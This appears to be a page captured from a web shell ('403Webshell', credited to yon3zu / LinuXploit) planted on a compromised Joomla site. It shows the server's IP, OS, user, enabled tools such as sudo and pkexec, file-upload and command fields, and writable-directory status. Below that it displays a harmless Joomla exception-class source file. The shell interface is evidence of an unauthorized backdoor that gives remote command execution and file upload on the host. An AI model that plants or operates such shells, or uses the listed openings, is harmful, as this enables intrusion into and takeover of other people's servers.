403Webshell
Server IP : 172.67.191.97  /  Your IP : 104.23.243.196
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/pts/libraries/vendor/joomla/archive/src/Exception/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/pts/libraries/vendor/joomla/archive/src/Exception/UnsupportedArchiveException.php
<?php

/**
 * Part of the Joomla Framework Archive Package
 *
 * @copyright  Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Archive\Exception;

/**
 * Exception class defining an unsupported archive adapter
 *
 * @since  2.0.0
 */
class UnsupportedArchiveException extends \InvalidArgumentException
{
    /**
     * The unsupported archive adapter name
     *
     * @var    string
     * @since  2.0.0-beta2
     */
    protected $adapterType = '';

    /**
     * Constructor
     *
     * @param   string       $adapterType  The unsupported adapter type.
     * @param   string       $message      The Exception message to throw.
     * @param   int          $code         The Exception code.
     * @param   ?\Throwable  $previous     The previous throwable used for the exception chaining.
     *
     * @since  2.0.0-beta2
     */
    public function __construct(string $adapterType, string $message = '', int $code = 0, ?\Throwable $previous = null)
    {
        $this->adapterType = $adapterType;

        parent::__construct($message, $code, $previous);
    }

    /**
     * Gets the name of the adapter type that was unsupported
     *
     * @return  string
     *
     * @since  2.0.0-beta2
     */
    public function getUnsupportedAdapterType(): string
    {
        return $this->adapterType;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit